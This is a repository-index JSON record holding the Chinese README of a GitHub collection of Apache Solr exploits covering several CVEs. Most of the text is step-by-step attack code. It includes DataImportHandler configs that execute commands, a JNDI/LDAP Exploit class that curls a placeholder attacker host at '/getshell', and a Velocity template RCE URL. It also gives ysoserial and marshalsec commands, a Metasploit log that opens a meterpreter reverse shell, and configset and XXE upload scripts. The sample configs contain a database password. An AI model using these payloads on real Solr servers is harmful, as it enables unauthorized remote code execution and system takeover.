{"id":13842647,"url":"https://github.com/Imanfeng/Apache-Solr-RCE","last_synced_at":"2025-07-11T15:32:29.708Z","repository":{"id":44337885,"uuid":"201634206","full_name":"Imanfeng/Apache-Solr-RCE","owner":"Imanfeng","description":"Apache Solr Exploits  🌟","archived":false,"fork":false,"pushed_at":"2020-10-13T11:45:17.000Z","size":9735,"stargazers_count":337,"open_issues_count":1,"forks_count":57,"subscribers_count":7,"default_branch":"master","last_synced_at":"2024-11-21T13:36:35.019Z","etag":null,"topics":["cve-2017-12629","cve-2018-8026","cve-2019-0192","cve-2019-0193","cve-2019-12409","cve-2019-17558","cve-2020-13957"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Imanfeng.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-08-10T13:30:44.000Z","updated_at":"2024-11-20T01:57:24.000Z","dependencies_parsed_at":"2022-08-30T19:50:20.687Z","dependency_job_id":null,"html_url":"https://github.com/Imanfeng/Apache-Solr-RCE","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Imanfeng/Apache-Solr-RCE","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Imanfeng%2FApache-Solr-RCE","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Imanfeng%2FApache-Solr-RCE/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Imanfeng%2FApache-Solr-RCE/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Imanfeng%2FApache-Solr-RCE/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Imanfeng","download_url":"https://codeload.github.com/Imanfeng/Apache-Solr-RCE/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Imanfeng%2FApache-Solr-RCE/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264841267,"owners_count":23671873,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2017-12629","cve-2018-8026","cve-2019-0192","cve-2019-0193","cve-2019-12409","cve-2019-17558","cve-2020-13957"],"created_at":"2024-08-04T17:01:41.921Z","updated_at":"2025-07-11T15:32:24.695Z","avatar_url":"https://github.com/Imanfeng.png","language":null,"funding_links":[],"categories":["Others (1002)","Others"],"sub_categories":[],"readme":"# Apache-Solr-Vulnerability\nApache Solr Some Exploits  🌟\n\n[CVE-2019-0193](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2019-0193)\n\n[CVE-2019-0192](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2019-0192)\n\n[CVE-2019-17558](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2019-17558)\n\n[CVE-2017-12629](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2017-12629)\n\n[CVE-2019-12409](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2019-12409)\n\n[CVE-2020-13957](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2020-13957)\n\n[CVE-2018-8026](https://github.com/Imanfeng/Apache-Solr-RCE#cve-2018-8026)\n\n## CVE-2019-0193\nApache Solr DataImportHandler RCE\n\n### 影响版本\nApache Solr \u003c 8.2.0 并且开启了DataImportHandler模块(默认情况下该模块不被启用)\n\n### 漏洞利用\n\n1.首先判读是否solr不需认证直接可访问后台（大多数均可访问）\n\n2.判断是否存在collections\n\n![1](pic/1.png)\n\n3.判断collections是否可以使用dataimport功能\n\n![2](pic/2.png)\n\n4.debug模式修改configuration\n\n原：\n\n```xml\n\u003cdataConfig\u003e\n  \u003cdataSource  type=\"JdbcDataSource\"\n               driver=\"com.microsoft.sqlserver.jdbc.SQLServerDriver\"\n               url=\"jdbc:sqlserver://SqlServer;databaseName=TrainUpCore\"\n               user=\"pid.trainup\"\n               password=\"S@cram3nt0\"\n               readOnly=\"true\"\n              /\u003e\n\n\n  \u003cdocument name=\"TrainUpDoc\"\u003e\n  \u003centity name=\"Lo\" query=\"select newid() id, * from CatalogSearch.Categories_LiveTrainingWithoutLocation order by ItemTitle\"\u003e\n                          \u003cfield column=\"ItemTitle\" name=\"ItemTitle\"/\u003e\n                          \u003cfield column=\"ItemCourseId\" name=\"ItemCourseId\"/\u003e\n                          \u003cfield column=\"ItemDescription\" name=\"ItemDescription\"/\u003e\n                          \u003cfield column=\"Price\" name=\"ItemPrice\"/\u003e\n                          \u003cfield column=\"ItemDurationType\" name=\"ItemDurationType\"/\u003e\n                          \u003cfield column=\"ItemDurationValue\" name=\"ItemDurationValue\"/\u003e\n                          \u003cfield column=\"typeItemCode\" name=\"typeItemCode\"/\u003e\n                          \u003cfield column=\"ProviderWeight\" name=\"ProviderWeight\"/\u003e\n                          \u003cfield column=\"ItemCatId\" name=\"ItemCatId\"/\u003e\n                          \u003cfield column=\"PublishedDate\" name=\"PublishedDate\"/\u003e\n                          \u003cfield column=\"ItemImageUrl\" name=\"ItemImageUrl\"/\u003e\n                          \u003cfield column=\"ItemTrainingRating\" name=\"ItemTrainingRating\"/\u003e\n                          \u003cfield column=\"#Row\" name=\"#Row\"/\u003e\n                          \u003cfield column=\"ItemCatImageUrl\" name=\"ItemCatImageUrl\"/\u003e\n                          \u003cfield column=\"ItemEventsno\" name=\"ItemEventsno\"/\u003e\n                          \u003cfield column=\"CourseWeight\" name=\"CourseWeight\"/\u003e\n                          \u003cfield column=\"CategoryRankScore\" name=\"CategoryRankScore\"/\u003e\n                          \n  \u003c/entity\u003e\n  \u003c/document\u003e\n\u003c/dataConfig\u003e\n```\n\n[1] 无回显 直接执行命令修改：\n\n​\t（1）在entity中添加transformer=\"script:f1\"，f1为函数名\n\n​\t（2）添加\u003cscript\u003e内容\n\n​\t（3）execute with this configuration\n\n```xml\n\u003cdataConfig\u003e\n  \u003cdataSource  type=\"JdbcDataSource\"\n               driver=\"com.microsoft.sqlserver.jdbc.SQLServerDriver\"\n               url=\"jdbc:sqlserver://SqlServer;databaseName=TrainUpCore\"\n               user=\"pid.trainup\"\n               password=\"S@cram3nt0\"\n               readOnly=\"true\"\n              /\u003e\n     \u003cscript\u003e\u003c![CDATA[\n        function f1(row){\n        java.lang.Runtime.getRuntime().exec(\"powershell xxx\");\n        return row;\n        }\n    ]]\u003e\u003c/script\u003e\n\n\n  \u003cdocument name=\"TrainUpDoc\"\u003e\n  \u003centity name=\"Lo\" transformer=\"script:f1\" query=\"select newid() id, * from CatalogSearch.Categories_LiveTrainingWithLocation order by ItemTitle\"\u003e\n                          \u003cfield column=\"ItemTitle\" name=\"ItemTitle\"/\u003e\n                          \u003cfield column=\"ItemCourseId\" name=\"ItemCourseId\"/\u003e\n                          \u003cfield column=\"ItemDescription\" name=\"ItemDescription\"/\u003e\n                          \u003cfield column=\"Price\" name=\"ItemPrice\"/\u003e\n                          \u003cfield column=\"ItemDurationType\" name=\"ItemDurationType\"/\u003e\n                          \u003cfield column=\"ItemDurationValue\" name=\"ItemDurationValue\"/\u003e\n                          \u003cfield column=\"typeItemCode\" name=\"typeItemCode\"/\u003e\n                          \u003cfield column=\"ProviderWeight\" name=\"ProviderWeight\"/\u003e\n                          \u003cfield column=\"ItemCatId\" name=\"ItemCatId\"/\u003e\n                          \u003cfield column=\"PublishedDate\" name=\"PublishedDate\"/\u003e\n                          \u003cfield column=\"ItemImageUrl\" name=\"ItemImageUrl\"/\u003e\n                          \u003cfield column=\"ItemTrainingRating\" name=\"ItemTrainingRating\"/\u003e\n                          \u003cfield column=\"#Row\" name=\"#Row\"/\u003e\n                          \u003cfield column=\"ItemCatImageUrl\" name=\"ItemCatImageUrl\"/\u003e\n                          \u003cfield column=\"ItemEventsno\" name=\"ItemEventsno\"/\u003e\n                          \u003cfield column=\"CityItemEventsno\" name=\"CityItemEventsno\"/\u003e\n                          \u003cfield column=\"StartDate\" name=\"StartDate\"/\u003e\n                          \u003cfield column=\"StartTime\" name=\"StartTime\"/\u003e\n                          \u003cfield column=\"TimeZone\" name=\"TimeZone\"/\u003e\n                          \u003cfield column=\"MarketCityID\" name=\"MarketCityID\"/\u003e\n                          \u003cfield column=\"ItemCity\" name=\"ItemCity\"/\u003e\n                          \u003cfield column=\"CourseWeight\" name=\"CourseWeight\"/\u003e\n                          \u003cfield column=\"CategoryRankScore\" name=\"CategoryRankScore\"/\u003e\n  \u003c/entity\u003e\n  \u003c/document\u003e\n\u003c/dataConfig\u003e\n```\n\n![3](pic/3.png)\n\n\n\n[2] 有回显 直接执行命令修改：\n\n​\t（1）在entity中添加transformer=\"script:f1\"，f1为函数名\n\n​\t（2）添加\u003cscript\u003e内容，将执行回显输出到field的参数重，如id、ItemDescription，若不行则需结合managed-schema配置输出\n\n​\t（3）execute with this configuration\n\n```xml\n\u003cdataConfig\u003e\n  \u003cdataSource  type=\"JdbcDataSource\"\n               driver=\"com.microsoft.sqlserver.jdbc.SQLServerDriver\"\n               url=\"jdbc:sqlserver://SqlServer;databaseName=TrainUpCore\"\n               user=\"pid.trainup\"\n               password=\"S@cram3nt0\"\n               readOnly=\"true\"\n              /\u003e\n\t\u003cscript\u003e\u003c![CDATA[\n        function f1(row){\n        row.put(\"id\",new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"whoami\").getInputStream())).readLine());\n        return row;\n        }\n    ]]\u003e\u003c/script\u003e\n\n\n  \u003cdocument name=\"TrainUpDoc\"\u003e\n  \u003centity name=\"Lo\" transformer=\"script:f1\" query=\"select newid() id, * from CatalogSearch.Categories_LiveTrainingWithLocation order by ItemTitle\"\u003e\n                          \u003cfield column=\"ItemCourseId\" name=\"id\"/\u003e\n                          \u003cfield column=\"ItemDescription\" name=\"ItemDescription\"/\u003e\n                          \u003cfield column=\"Price\" name=\"ItemPrice\"/\u003e\n                          \u003cfield column=\"ItemDurationType\" name=\"ItemDurationType\"/\u003e\n                          \u003cfield column=\"ItemDurationValue\" name=\"ItemDurationValue\"/\u003e\n                          \u003cfield column=\"typeItemCode\" name=\"typeItemCode\"/\u003e\n                          \u003cfield column=\"ProviderWeight\" name=\"ProviderWeight\"/\u003e\n                          \u003cfield column=\"ItemCatId\" name=\"ItemCatId\"/\u003e\n                          \u003cfield column=\"PublishedDate\" name=\"PublishedDate\"/\u003e\n                          \u003cfield column=\"ItemImageUrl\" name=\"ItemImageUrl\"/\u003e\n                          \u003cfield column=\"ItemTrainingRating\" name=\"ItemTrainingRating\"/\u003e\n                          \u003cfield column=\"#Row\" name=\"#Row\"/\u003e\n                          \u003cfield column=\"ItemCatImageUrl\" name=\"ItemCatImageUrl\"/\u003e\n                          \u003cfield column=\"ItemEventsno\" name=\"ItemEventsno\"/\u003e\n                          \u003cfield column=\"CityItemEventsno\" name=\"CityItemEventsno\"/\u003e\n                          \u003cfield column=\"StartDate\" name=\"StartDate\"/\u003e\n                          \u003cfield column=\"StartTime\" name=\"StartTime\"/\u003e\n                          \u003cfield column=\"TimeZone\" name=\"TimeZone\"/\u003e\n                          \u003cfield column=\"MarketCityID\" name=\"MarketCityID\"/\u003e\n                          \u003cfield column=\"ItemCity\" name=\"ItemCity\"/\u003e\n                          \u003cfield column=\"CourseWeight\" name=\"CourseWeight\"/\u003e\n                          \u003cfield column=\"CategoryRankScore\" name=\"CategoryRankScore\"/\u003e\n  \u003c/entity\u003e\n  \u003c/document\u003e\n\u003c/dataConfig\u003e\n```\n\n![4](pic/4.png)\n\n[3] JNDI+LDAP（无需目标的CLASSPATH存在数据库驱动）：\n\n​\t（1）修改configuration内容\n\n```xml\n\u003cdataConfig\u003e\n\t\u003cdataSource type=\"JdbcDataSource\"\n\t\tjndiName=\"ldap://xxx.xxx.xxx.xxx:1389/Exploit\"/\u003e\n\t\u003cdocument\u003e\n\t\t\u003centity name=\"test\"\u003e\n\t\t\u003c/entity\u003e\n\t\u003c/document\u003e\t\n\u003c/dataConfig\u003e\n```\n\n​\t（2）hackserver\n\nExploit.java\n\n```java\nimport javax.naming.Context;\nimport javax.naming.Name;\nimport javax.naming.spi.ObjectFactory;\nimport java.io.*;\nimport java.util.Hashtable;\n\npublic class Exploit implements ObjectFactory {\n\n    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable\u003c?, ?\u003e environment) {\n        try {\n            Runtime.getRuntime().exec(\"curl http://xxx.xxx.xxx.xxx:1212/getshell\");\n        } catch (IOException e) {\n            e.printStackTrace();\n        }\n        return null;\n    }\n}\n```\n\nJDK 高版本会限制远程codebase 加载，期待1.8以下\n\n```\njavac --release 7 Exploit.java\n\njava -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndiDAPRefServer http://xxx.xxx.xxx.xxx:8888/#Exploit 1389\n\npython3 -m http.server 8888\n```\n\n​\t（3）execute with this configuration\n\n![5](pic/5.png)\n\n### 工具利用\n\nhttps://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192/blob/master/solr_RCE.py\nhttps://github.com/weTomorrow/solr_poc/blob/master/solr_poc.py\n\n## CVE-2019-0192\n\n### 影响版本\n\nApache Solr 5.0.0-5.5.5 版本\n\nApache Solr 6.0.0-6.6.5 版本\n\n### 漏洞利用\n\nconfigAPI主要功能是检索或修改配置。 GET负责检索，POST负责执行命令。通过传入set-property属性，构造恶意的数据，传入指向恶意的rmi服务器的链接，覆盖之前服务器的原设置，使得目标服务器与攻击者的恶意rmi服务器相连，攻击者可以使用ysoserial工具，通过rmi服务器向远端目标服务器发送命令，并在目标服务器上执行，实现远程命令执行\n\n1.首先判读存在cores节点\n\n```\nhttp://ip:port/solr/admin/cores?wt=json\n```\n\n![7](pic/7.png)\n\n```\nhttp://ip:port/solr/name[0]/config\n```\n\n![8](pic/8.png)\n\n2.server通过ysoserial部署RMI server\n\n```\njava -cp ysoserial.jar ysoserial.exploit.JRMPListener 1234 Jdk7u21 \"cmd\"\n```\n\n![9](pic/9.png)\n\n注意: 你会看到返回中出现500错误\n\n如果错误中包含: “Non-annotation type in annotation serial stream” 说明 Apache Solr 的Java版本 \u003e JRE 7u25，则PoC执行不成功。\n\n如果你看到错误中包含: “undeclared checked exception; nested exception is”，则PoC执行成功.\n\n### 工具利用\n\nhttps://github.com/mpgn/CVE-2019-0192/blob/master/CVE-2019-0192.py\n\n## CVE-2019-17558\n\n### 影响版本\n\nApache Solr 5.x到8.2.0版本\n\n### 漏洞利用\n```\nhttp://ip:port/solr/+core_name+/select?q=1\u0026\u0026wt=velocity\u0026v.template=custom\u0026v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end\n```\n\n![6](pic/6.png)\n\n### 工具利用\n\nhttps://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template\n\n## CVE-2017-12629\n\n### 影响版本\n\nApache Solr 5.5.0到7.0.1版本\n\n### 漏洞利用\n此次7.1.0之前版本总共爆出两个漏洞：XML实体扩展漏洞（XXE）和远程命令执行漏洞（RCE），二者可以连接成利用链，编号均为CVE-2017-12629。\n\nhttps://paper.seebug.org/425/\n\n## CVE-2019-12409\n\n### 影响版本\nAPACHE SOLR 8.1.1/8.2.0 CONFIGURATION FILE SOLR.IN.SH PRIVILEGE ESCALATION\n\n### 漏洞利用\nApache Solr的8.1.1和8.2.0发行版中的默认配置文件solr.in.sh,在其配置文件中ENABLE_REMOTE_JMX_OPTS字段默认配置不安全.如果使用受影响版本中的默认配置,那么将启用JMX监视服务并将对公网监听一个18983的RMI端口,且无需进行任何身份验证,配合JMX RMI将会导致远程代码执行.\n\n使用Metasploit \n```\nmsf5 \u003e use multi/misc/java_jmx_server\nmsf5 exploit(multi/misc/java_jmx_server) \u003e show options\n\nModule options (exploit/multi/misc/java_jmx_server):\n\n   Name          Current Setting  Required  Description\n   ----          ---------------  --------  -----------\n   JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound\n   JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint\n   JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint\n   RHOSTS                         yes       The target address range or CIDR identifier\n   RPORT                          yes       The target port (TCP)\n   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0\n   SRVPORT       8080             yes       The local port to listen on.\n   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)\n   URIPATH                        no        The URI to use for this exploit (default is random)\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Generic (Java Payload)\n\n\nmsf5 exploit(multi/misc/java_jmx_server) \u003e set RHOSTS a.a.a.a\nRHOSTS =\u003e a.a.a.a\nmsf5 exploit(multi/misc/java_jmx_server) \u003e set RPORT 18983\nRPORT =\u003e 18983\nmsf5 exploit(multi/misc/java_jmx_server) \u003e set payload java/meterpreter/reverse_tcp\npayload =\u003e java/meterpreter/reverse_tcp\nmsf5 exploit(multi/misc/java_jmx_server) \u003e show options\n\nModule options (exploit/multi/misc/java_jmx_server):\n\n   Name          Current Setting  Required  Description\n   ----          ---------------  --------  -----------\n   JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound\n   JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint\n   JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint\n   RHOSTS        a.a.a.a     yes       The target address range or CIDR identifier\n   RPORT         18983            yes       The target port (TCP)\n   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0\n   SRVPORT       8080             yes       The local port to listen on.\n   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)\n   URIPATH                        no        The URI to use for this exploit (default is random)\n\n\nPayload options (java/meterpreter/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST                   yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Generic (Java Payload)\n\n\nmsf5 exploit(multi/misc/java_jmx_server) \u003e set LHOST b.b.b.b\nLHOST =\u003e b.b.b.b\nmsf5 exploit(multi/misc/java_jmx_server) \u003e run\n[*] Started reverse TCP handler on b.b.b.b:4444\n[*] a.a.a.a:18983 - Using URL: http://b.b.b.b:8080/OcbYS8uaTPDH\n[*] a.a.a.a:18983 - Sending RMI Header...\n[*] a.a.a.a:18983 - Discovering the JMXRMI endpoint...\n[+] a.a.a.a:18983 - JMXRMI endpoint on a.a.a.a:18983\n[*] a.a.a.a:18983 - Proceeding with handshake...\n[+] a.a.a.a:18983 - Handshake with JMX MBean server on a.a.a.a:18983\n[*] a.a.a.a:18983 - Loading payload...\n[*] a.a.a.a:18983 - Replied to request for mlet\n[*] a.a.a.a:18983 - Replied to request for payload JAR\n[*] a.a.a.a:18983 - Executing payload...\n[*] a.a.a.a:18983 - Replied to request for payload JAR\n[*] Sending stage (53867 bytes) to a.a.a.a\n[*] Meterpreter session 1 opened (a.a.a.a:4444 -\u003e b.b.b.b:46582) at 2019-11-21 15:24:53 +0000\n\nmeterpreter \u003e \n```\n\n### 工具利用\nhttps://github.com/siberas/sjet\n\n## CVE-2020-13957\n\n### 影响版本\n\nApache Solr 6.6.0 - 6.6.5\n\nApache Solr 7.0.0 - 7.7.3\n\nApache Solr 8.0.0 - 8.6.2\n\n### 漏洞利用\n\nApache Solr Configset Api上传功能存在未授权漏洞。攻击者可以上传含有恶意配置的solrconfig.xml从而触发CVE-2019-17558进行命令执行（SolrCloud模式才可利用）\n\n1.首先构造含有恶意配置的myconfigset.zip\n\n![10](pic/10.png)\n\n2.上传myconfigset.zip进入ZooKeeper\n\n```\ncurl -X POST --header \"Content-Type:application/octet-stream\" --data-binary @myconfigset.zip \"http://localhost:8983/solr/admin/configs?action=UPLOAD\u0026name=test3myConfigSet\"\n```\n\n![11](pic/11.png)\n\n3.从Zookeeper中选择恶意的solrconfig.xml创建新的Collection\n\n```\ncurl -v \"http://localhost:8983/solr/admin/collections?action=CREATE\u0026name=newCollection3\u0026numShards=2\u0026replicationFactor=1\u0026wt=xml\u0026collection.configName=test3myConfigSet\"\n```\n\n![12](pic/12.png)\n\n4.EXP命令执行\n\n```\ncurl -v \"http://127.0.0.1:8983/solr/newCollection3/select?q=1\u0026\u0026wt=velocity\u0026v.template=custom\u0026v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end\"\n```\n\n![13](pic/13.png)\n\n## CVE-2018-8026\n\n### 影响版本\n\nApache Solr \u003e= 6.0.0, \u003c 6.6.5\n\nApache Solr \u003e= 7.0.0, \u003c 7.4.0\n\n### 漏洞利用\n这次的XXE漏洞依赖于SolrCloud API，影响到SolrCloud分布式系统。而SolrCloud需要用到zookeeper\n\n```\nimport requests\n\nupload_url = \"http://127.0.0.1:8983/solr/admin/configs?action=UPLOAD\u0026name=evilconfig\"\nfiles = open(\"evil.zip\", \"rb\")\nprint(requests.post(upload_url, data=files).text)\n\ncreate_url = \"http://127.0.0.1:8983/solr/admin/collections?action=CREATE\u0026name=eviltest\u0026numShards=1\u0026collection.configName=evilconfig\"\nprint(requests.get(create_url).text)\n```\n\nhttps://xz.aliyun.com/t/2448\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FImanfeng%2FApache-Solr-RCE","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FImanfeng%2FApache-Solr-RCE","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FImanfeng%2FApache-Solr-RCE/lists"}